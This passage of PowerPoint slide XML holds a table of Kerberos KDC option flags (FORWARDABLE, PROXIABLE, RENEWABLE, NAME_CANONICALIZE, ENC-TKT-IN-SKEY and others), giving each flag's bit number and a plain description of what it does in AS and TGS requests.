                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) In a KRB_TGS_REQ for user-to-user authentication, a TGT will be included in this field. The TGS will use the session key from this TGT — instead of the service's secret key — to encrypt the service ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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145216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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KDC Options in KRB_AS_REQ and KRB_TGS_REQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="コンテンツ プレースホルダー 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8393375" cy="4348318"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1522140">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="396240">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6474995">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="191935">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flag</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>FORWARDABLE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket can be forwarded. Allowed addresses are specified in the message's Addresses field.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>FORWARDED</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket is a forwarded ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PROXIABLE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket can be proxied.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PROXY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket is a proxy ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="394900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ALLOW POSTDATE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket can be post-dated. When the service wanted the ticket to be activated, it would send a TGS request with the VALIDATE flag set (below). Not supported in Windows 2000, but supported in Windows Server 2003.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>POST-DATED</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket is post-dated. Not supported in Windows 2000, but supported in Windows Server 2003.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RENEWABLE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket can be renewed.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="783181">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NAME_CANONICALIZE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>15</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Indicates to the KDC that the client is prepared to receive a reply with a different client or server principal name than was sent in the request. This flag is used in referrals. It also alerts the KDC that the target server might be in another realm.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The KDC option flag NAME_CANONICALIZE is important for cross-realm authentication.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="589041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RENEWABLE OK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>27</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This flag means that it is okay to issue a renewable ticket if a ticket with the requested expiration time cannot be provided. However, it does not mean that the ticket requested should be renewable. That flag is set by flag bit 8.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="589041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ENC-TKT-IN-SKEY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>28</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encrypt ticket in session key. Normally, tickets are encrypted with the target server key. However, in user-to-user authentication, the ticket is encrypted with the session key taken from a provided TGT. This flag is used in that situation.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="394900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RENEW</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>30</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is not used for the KRB_AS_REQ message. If a ticket is flagged RENEWABLE and needs to be renewed, this flag would be set and the ticket needing renewal would be included with the KRB_TGS_REQ message.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>VALIDATE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
